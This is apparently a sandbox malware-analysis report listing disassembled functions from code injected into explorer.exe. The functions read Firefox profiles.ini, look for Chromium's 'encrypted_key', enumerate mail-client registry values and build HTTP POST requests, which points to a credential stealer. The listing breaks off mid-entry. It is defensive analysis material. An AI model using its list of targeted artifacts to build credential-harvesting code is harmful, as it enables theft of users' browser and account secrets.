                                                                        Function 03272CB5 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 112stringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 484 3272cb5-3272cc7 call 3271953 488 3272e17-3272e2d call 3272ae9 484->488 489 3272ccd-3272d06 call 3271953 call 3271000 * 2 call 3271b6a 484->489 500 3272d0c-3272d1c GetPrivateProfileSectionNamesW 489->500 501 3272df9-3272e12 call 3271011 * 4 489->501 500->501 503 3272d22-3272d26 500->503 501->488 505 3272df5 503->505 506 3272d2c-3272d32 503->506 505->501 508 3272d36-3272d39 506->508 510 3272d3f-3272d4d StrStrIW 508->510 511 3272ded-3272df1 508->511 513 3272dd7-3272de7 lstrlenW 510->513 514 3272d53-3272d70 GetPrivateProfileStringW 510->514 511->505 513->508 513->511 514->513 516 3272d72-3272d88 GetPrivateProfileIntW 514->516 518 3272dcc-3272dd2 call 3272ae9 516->518 519 3272d8a-3272d9c call 3271953 516->519 518->513 523 3272db4-3272dca call 3272ae9 call 3271011 519->523 524 3272d9e-3272da2 519->524 523->513 525 3272da4-3272daa 524->525 526 3272dac-3272db2 524->526 525->526 526->523 526->524
                                                                        APIs
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03272F0C), ref: 03271973
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(032C6564,?,?,03272F0C), ref: 03271978
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,?,?,?,03272F0C), ref: 03271990
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,032C6564,?,?,03272F0C), ref: 03271994
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                          • Part of subcall function 03271B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03272893,00000000,00000000,00000000,?), ref: 03271B82
                                                                          • Part of subcall function 03271B6A: CloseHandle.KERNELBASE(00000000), ref: 03271B8F
                                                                        • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 03272D13
                                                                        • StrStrIW.SHLWAPI(00000000,Profile), ref: 03272D45
                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,Path,032C637C,?,00000FFF,?), ref: 03272D68
                                                                        • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 03272D7B
                                                                        • lstrlenW.KERNEL32(00000000), ref: 03272DD8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                                        • String ID: IsRelative$Path$Profile$profiles.ini
                                                                        • API String ID: 2234428054-4107377610
                                                                        • Opcode ID: e2f1a953709a02ff849acbf8699ec6777dc34310041d99a51a363d48a953b246
                                                                        • Instruction ID: 5ba60ec6ee74f858843fe452ef5bfcf213984551e5a7ec445c200eb7b7ad578c
                                                                        • Opcode Fuzzy Hash: e2f1a953709a02ff849acbf8699ec6777dc34310041d99a51a363d48a953b246
                                                                        • Instruction Fuzzy Hash: CA318F34734342DBC714FF31985463FB6A2BFC9600F08482DE946AB281DBB599D69792
                                                                        Function 03271333 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 226COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 576 3271333-3271385 call 3271000 call 327106c call 32712a3 583 3271387-327139e 576->583 584 32713a0-32713a3 576->584 587 32713b0-32713b2 583->587 585 32713aa-32713ac 584->585 585->587 588 32715cb-32715da call 3271011 587->588 589 32713b8-32713ef RtlZeroMemory 587->589 593 32713f5-327141a 589->593 594 32715c3-32715ca 589->594 597 3271420-3271456 call 32710b1 593->597 598 32715bf 593->598 594->588 601 327145d-3271478 597->601 602 3271458 597->602 598->594 604 32715b5 601->604 605 327147e-3271483 601->605 602->601 604->598 606 3271485-3271496 605->606 607 327149d-32714c7 call 3271000 wsprintfW 605->607 606->607 610 32714e0-3271509 607->610 611 32714c9-32714cb 607->611 618 32715a5 610->618 619 327150f-327151b 610->619 612 32714cc-32714cf 611->612 613 32714d1-32714d6 612->613 614 32714da-32714dc 612->614 613->612 616 32714d8 613->616 614->610 616->610 621 32715ac-32715b0 call 3271011 618->621 619->618 622 3271521-3271537 call 3271000 619->622 621->604 626 3271539-3271544 622->626 627 3271546-3271553 call 327102f 626->627 628 3271558-327156f 626->628 627->628 632 3271573-327157d 628->632 633 3271571 628->633 632->626 634 327157f-3271583 632->634 633->632 635 3271585 call 327104c 634->635 636 327159a-32715a1 call 3271011 634->636 639 327158a-3271594 RtlMoveMemory 635->639 636->618 639->636
                                                                        APIs
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                          • Part of subcall function 0327106C: lstrlen.KERNEL32(03587366,00000000,00000000,00000000,03271366,75918A60,03587366,00000000), ref: 03271074
                                                                          • Part of subcall function 0327106C: MultiByteToWideChar.KERNEL32(00000000,00000000,03587366,00000001,00000000,00000000), ref: 03271086
                                                                          • Part of subcall function 032712A3: RtlZeroMemory.NTDLL(?,00000018), ref: 032712B5
                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 032713C2
                                                                        • wsprintfW.USER32 ref: 032714B5
                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 03271594
                                                                        Strings
                                                                        • Content-Type: application/x-www-form-urlencoded, xrefs: 032714FB
                                                                        • Accept: */*Referer: %S, xrefs: 032714AF
                                                                        • POST, xrefs: 03271465
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                        • API String ID: 3833683434-704803497
                                                                        • Opcode ID: 4311ba9cfc27f73f105e55b422bafee6e6c1b9de818cc2182b9c8ca5d5148bb1
                                                                        • Instruction ID: 50b5a71cd00db875e617def98f2c1ebb4ebc9fdaa1429afc9dc5befde5070016
                                                                        • Opcode Fuzzy Hash: 4311ba9cfc27f73f105e55b422bafee6e6c1b9de818cc2182b9c8ca5d5148bb1
                                                                        • Instruction Fuzzy Hash: 21719B74628341AFD714EF64D888A2BBBE9FF88744F08492DF991C7341DBB0E9548B52
                                                                        Function 0327B1E5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 174fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 667 327b1e5-327b20b 668 327b221-327b22a 667->668 669 327b20d-327b218 call 327aeea 667->669 671 327b240-327b243 668->671 672 327b22c-327b237 call 327ae65 668->672 678 327b21e 669->678 679 327b3ea-327b3f0 669->679 675 327b3b9-327b3d3 671->675 676 327b249-327b26b call 327a7ae 671->676 684 327b3b4-327b3b7 672->684 685 327b23d 672->685 677 327b3db-327b3df 675->677 687 327b296-327b29f 676->687 688 327b26d-327b278 676->688 682 327b3e1-327b3e3 677->682 683 327b3e8 677->683 678->668 682->683 690 327b3e5-327b3e7 682->690 683->679 684->675 689 327b3d5-327b3d8 684->689 685->671 692 327b2d6-327b2ea call 3276a5a 687->692 693 327b2a1 687->693 691 327b27d-327b291 call 327a1c6 688->691 689->677 690->683 691->684 700 327b2f6-327b2fd 692->700 701 327b2ec-327b2f1 692->701 694 327b2a3-327b2a7 693->694 695 327b2a9-327b2ad 693->695 694->692 694->695 695->684 699 327b2b3-327b2b9 call 327a67c 695->699 707 327b2be-327b2c2 699->707 704 327b373 700->704 705 327b2ff-327b30e 700->705 701->684 708 327b377-327b37a 704->708 705->708 707->692 709 327b2c4-327b2d4 707->709 710 327b310-327b329 CreateFileMappingW 708->710 711 327b37c 708->711 709->691 712 327b37e-327b3ab call 327a1c6 710->712 713 327b32b-327b357 MapViewOfFile 710->713 711->684 712->684 718 327b3ad 712->718 713->712 714 327b359-327b370 713->714 714->704 718->684
                                                                        APIs
                                                                        • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 0327B31D
                                                                        • MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 0327B34F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$CreateMappingView
                                                                        • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                        • API String ID: 3452162329-3826999013
                                                                        • Opcode ID: 5098926d098fc65d7ad473e5e7e94d3079facf328b8a64f2b44bc135ef747346
                                                                        • Instruction ID: bf10a527c8c04116aa3230afa3b51e12d519dbf27b560be88340871cf6c3cc59
                                                                        • Opcode Fuzzy Hash: 5098926d098fc65d7ad473e5e7e94d3079facf328b8a64f2b44bc135ef747346
                                                                        • Instruction Fuzzy Hash: 9C51E475620742DFDB25DF18C844A6BB7E5FF84314F04882EE8428B740DBB0E895CB91
                                                                        Function 0327A40E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 719 327a40e-327a424 720 327a426-327a42a 719->720 721 327a4a2-327a4aa 719->721 722 327a431-327a441 720->722 723 327a42c-327a42f 720->723 724 327a4ae-327a4c8 721->724 725 327a443 722->725 726 327a469-327a4a0 memcpy 722->726 723->721 723->722 727 327a4cc-327a4e3 ReadFile 724->727 728 327a445-327a448 725->728 729 327a44a-327a45a memcpy 725->729 726->724 730 327a4e5-327a4ee 727->730 731 327a524-327a538 call 327a2aa 727->731 728->726 728->729 732 327a45d 729->732 730->731 737 327a4f0-327a4ff call 327a250 730->737 731->732 738 327a53e-327a553 memset 731->738 735 327a45f-327a466 732->735 737->727 741 327a501-327a51f call 327a1c6 737->741 738->735 741->735
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$FileReadmemset
                                                                        • String ID: winRead
                                                                        • API String ID: 2051157613-2759563040
                                                                        • Opcode ID: a5ea454c1850742f2814d5605bb6c5e6d3012a12b31220df166803b9c0ddb188
                                                                        • Instruction ID: dc25b244500f6886331114ca8f4e17995af7439c50cab5f3b79ad1b8a1132dc8
                                                                        • Opcode Fuzzy Hash: a5ea454c1850742f2814d5605bb6c5e6d3012a12b31220df166803b9c0ddb188
                                                                        • Instruction Fuzzy Hash: 3D31CE72625341AFC740DE18CC9489FB7EAFFC4360F885928F89597310D271EC848B92
                                                                        Function 03272E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • StrStrIW.KERNELBASE(?,?), ref: 03272E4B
                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 03272EE4
                                                                        • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 03272F54
                                                                        • RegCloseKey.KERNELBASE(?), ref: 03272F62
                                                                          • Part of subcall function 032719E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271A1E
                                                                          • Part of subcall function 032719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03271A3C
                                                                          • Part of subcall function 032719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03271A75
                                                                          • Part of subcall function 032719E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271A98
                                                                          • Part of subcall function 03271BC5: lstrlenW.KERNEL32(00000000,00000000,?,03272E75,PathToExe,00000000,00000000), ref: 03271BCC
                                                                          • Part of subcall function 03271BC5: StrStrIW.SHLWAPI(00000000,.exe,?,03272E75,PathToExe,00000000,00000000), ref: 03271BF0
                                                                          • Part of subcall function 03271BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,03272E75,PathToExe,00000000,00000000), ref: 03271C05
                                                                          • Part of subcall function 03271BC5: lstrlenW.KERNEL32(00000000,?,03272E75,PathToExe,00000000,00000000), ref: 03271C1C
                                                                          • Part of subcall function 03271AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,03272E83,PathToExe,00000000,00000000), ref: 03271B16
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                                        • String ID: PathToExe
                                                                        • API String ID: 1799103994-1982016430
                                                                        • Opcode ID: cd89d07a5d353e069017a6617c5d19254ea7497dfcd0ee7ddd6ce9c89a919e5c
                                                                        • Instruction ID: 0b9a86501c461dbb517d44eb426c01112f55423fa8e148b0c080ff41caffc1b8
                                                                        • Opcode Fuzzy Hash: cd89d07a5d353e069017a6617c5d19254ea7497dfcd0ee7ddd6ce9c89a919e5c
                                                                        • Instruction Fuzzy Hash: E331AF35624312AF8715EF228808C7FBAA9FFC8250F04851CFC558B244DA70E996DBE1
                                                                        Function 0327A67C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 782 327a67c-327a692 783 327a694-327a6bf _alldiv _allmul 782->783 784 327a6c1-327a6c4 782->784 785 327a6c7-327a6d2 call 327a33b 783->785 784->785 788 327a6d4-327a6df 785->788 789 327a6f0-327a6fb SetEndOfFile 785->789 792 327a6e4-327a6ee call 327a1c6 788->792 790 327a71e 789->790 791 327a6fd-327a708 789->791 793 327a722-327a726 790->793 791->790 799 327a70a-327a71c 791->799 792->793 796 327a73a-327a740 793->796 797 327a728-327a72b 793->797 797->796 800 327a72d 797->800 799->792 801 327a734-327a737 800->801 802 327a72f-327a732 800->802 801->796 802->796 802->801
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File_alldiv_allmul
                                                                        • String ID: winTruncate1$winTruncate2
                                                                        • API String ID: 3568847005-470713972
                                                                        • Opcode ID: bce29cde9a9360481c9967d8dc184629fbbec23bdd31f3825c2425d146c25b43
                                                                        • Instruction ID: ec0c9a841d58fce9f086f57d2c986a0672b224c5ed460869ba1e20e5649f6ae2
                                                                        • Opcode Fuzzy Hash: bce29cde9a9360481c9967d8dc184629fbbec23bdd31f3825c2425d146c25b43
                                                                        • Instruction Fuzzy Hash: C421CC72221240ABDF24DE2DCC84EAF77A9FF84320B158169ED14CB385D671E890CBA1
                                                                        Function 03274A71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • wsprintfW.USER32 ref: 03274AA2
                                                                        • RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 03274AC7
                                                                        • RegCloseKey.KERNELBASE(?), ref: 03274AD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                                        • String ID: %s\%08x$Software
                                                                        • API String ID: 1800864259-1658101971
                                                                        • Opcode ID: 814c197c066b37b304e73a355e36bde2917c6e56ae2b6c4618a5d3c9ce21d112
                                                                        • Instruction ID: 25ee96b8baf9edc53f44d1d031777e27274eec0b71f05d68ae0c1b512c0baadc
                                                                        • Opcode Fuzzy Hash: 814c197c066b37b304e73a355e36bde2917c6e56ae2b6c4618a5d3c9ce21d112
                                                                        • Instruction Fuzzy Hash: 0A01F275620108BFDB18EF95EC8EDBF77ADFB40344B44016EF905A3101EBB06E9096A0
                                                                        Function 03274317 Relevance: 7.6, APIs: 5, Instructions: 64registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _alloca_probe.NTDLL ref: 0327431C
                                                                        • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 03274335
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 03274363
                                                                        • RegCloseKey.ADVAPI32(?), ref: 032743C8
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03272F0C), ref: 03271973
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(032C6564,?,?,03272F0C), ref: 03271978
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,?,?,?,03272F0C), ref: 03271990
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,032C6564,?,?,03272F0C), ref: 03271994
                                                                          • Part of subcall function 0327418A: wsprintfW.USER32 ref: 03274212
                                                                          • Part of subcall function 03271011: GetProcessHeap.KERNEL32(00000000,00000000,?,03271A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2), ref: 03271020
                                                                          • Part of subcall function 03271011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271027
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 032743B9
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                                        • String ID:
                                                                        • API String ID: 801677237-0
                                                                        • Opcode ID: 1bca3914d5fcfd6cd38a97f70a01c0d08c663e021c16fe979191f2679dda866d
                                                                        • Instruction ID: b751f666d67d8f5d4b8e4d3dbc27c598c11886f65d6a9de80d97a2e1adc553cf
                                                                        • Opcode Fuzzy Hash: 1bca3914d5fcfd6cd38a97f70a01c0d08c663e021c16fe979191f2679dda866d
                                                                        • Instruction Fuzzy Hash: 071133B5124205AFE715EB11DC48DBF77DDFF84344F04462DB449D2150EBB4ED849A62
                                                                        Function 0327B87B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 202fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.NTDLL ref: 0327B8D5
                                                                        • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 0327B96F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFilememset
                                                                        • String ID: psow$winOpen
                                                                        • API String ID: 2416746761-4101858489
                                                                        • Opcode ID: 4aa3bf306232f1f9975c66dae5abf7b879242828372fee67ece640ac0a7321bc
                                                                        • Instruction ID: 00bec5ae0c5a902a271c58cbe1cfaf41da388f07a32e0b28561dc8c3f9e22893
                                                                        • Opcode Fuzzy Hash: 4aa3bf306232f1f9975c66dae5abf7b879242828372fee67ece640ac0a7321bc
                                                                        • Instruction Fuzzy Hash: 45718071A24702DFD750EF29D88175ABBE4FF48724F044A2DF8649B280D7B4D994CB92
                                                                        Function 032D9247 Relevance: 6.3, APIs: 4, Instructions: 343COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.00000000032D7000.00000040.80000000.00040000.00000000.sdmp, Offset: 032D7000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_32d7000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4a9b287179512c20758f9f487271b1f33b5bf3eae84b45801cb523c10e825a01
                                                                        • Instruction ID: b2022ce0733d54073f66468c120517f3ec43859fcd481279d820e99510a2160a
                                                                        • Opcode Fuzzy Hash: 4a9b287179512c20758f9f487271b1f33b5bf3eae84b45801cb523c10e825a01
                                                                        • Instruction Fuzzy Hash: F8A139729247925FD721CF78DCC46A0BBA5EB42324B1C07ACE5D18B2C3E7A054CAC751
                                                                        Function 032719E5 Relevance: 6.1, APIs: 4, Instructions: 89registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271A1E
                                                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03271A3C
                                                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03271A75
                                                                        • RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271A98
                                                                          • Part of subcall function 03271011: GetProcessHeap.KERNEL32(00000000,00000000,?,03271A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2), ref: 03271020
                                                                          • Part of subcall function 03271011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271027
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                                        • String ID:
                                                                        • API String ID: 217796345-0
                                                                        • Opcode ID: 5d840ab353f8a649a7b9e0c34af211cc9d193933b6a46e40f761d12abeab8336
                                                                        • Instruction ID: f9e30be9f1f226e2552df9abe7db2bab58b9f9729816bea95c136771918ba385
                                                                        • Opcode Fuzzy Hash: 5d840ab353f8a649a7b9e0c34af211cc9d193933b6a46e40f761d12abeab8336
                                                                        • Instruction Fuzzy Hash: 6621B172224342AFE724CA21DD08F3BB7ECFFC8744F084A2DF98692140E670E990C661
                                                                        Function 03271EC1 Relevance: 6.1, APIs: 4, Instructions: 82registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyW.ADVAPI32(?,?,?), ref: 03271ED5
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 03271F0C
                                                                        • RegCloseKey.ADVAPI32(?), ref: 03271F98
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03272F0C), ref: 03271973
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(032C6564,?,?,03272F0C), ref: 03271978
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,?,?,?,03272F0C), ref: 03271990
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,032C6564,?,?,03272F0C), ref: 03271994
                                                                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 03271F82
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                                        • String ID:
                                                                        • API String ID: 1077800024-0
                                                                        • Opcode ID: a80d16b6183a330e3048c50740e1ae6f1b44a8759ebff83cbe00a6c15886f057
                                                                        • Instruction ID: 9da3dbb98c836c704903d891261ba1ea0193ea5e56ed420a3ac89850084229ab
                                                                        • Opcode Fuzzy Hash: a80d16b6183a330e3048c50740e1ae6f1b44a8759ebff83cbe00a6c15886f057
                                                                        • Instruction Fuzzy Hash: EA219D71228301AFD705AB21DC48E3FBBEDFFC8244F04892DF89992150DB75E9659B62
                                                                        Function 03271C31 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,03273E1E,00000000,?,03273FA8), ref: 03271C46
                                                                        • GetFileSize.KERNEL32(00000000,00000000,00000000,?,03273FA8), ref: 03271C56
                                                                        • CloseHandle.KERNELBASE(00000000,?,03273FA8), ref: 03271C91
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,03273FA8), ref: 03271C76
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                        • String ID:
                                                                        • API String ID: 2517252058-0
                                                                        • Opcode ID: b7a5cb366188cad9cc1f06ca21384d25693e1f5ddb09a9687234749152c966d0
                                                                        • Instruction ID: af115a4d752c6577e8bdda6b5be001e09112ae571bfe4896995196634a461e25
                                                                        • Opcode Fuzzy Hash: b7a5cb366188cad9cc1f06ca21384d25693e1f5ddb09a9687234749152c966d0
                                                                        • Instruction Fuzzy Hash: 9FF028322202187BD320AA66EC8DF7B7A5CFF466F6F1A031CF805921C0DB7278918171
                                                                        Function 03272FB1 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,03273E30,00000000,00000000,?,03273FA8), ref: 03272FC1
                                                                        • lstrlen.KERNEL32("encrypted_key":",?,03273FA8), ref: 03272FCE
                                                                        • StrStrIA.SHLWAPI("encrypted_key":",032C692C,?,03273FA8), ref: 03272FDD
                                                                          • Part of subcall function 0327190B: lstrlen.KERNEL32(?,?,?,?,00000000,03272783), ref: 0327192B
                                                                          • Part of subcall function 0327190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,03272783), ref: 03271930
                                                                          • Part of subcall function 0327190B: lstrcat.KERNEL32(00000000,?), ref: 03271946
                                                                          • Part of subcall function 0327190B: lstrcat.KERNEL32(00000000,00000000), ref: 0327194A
                                                                        Strings
                                                                        Memory Dump Source
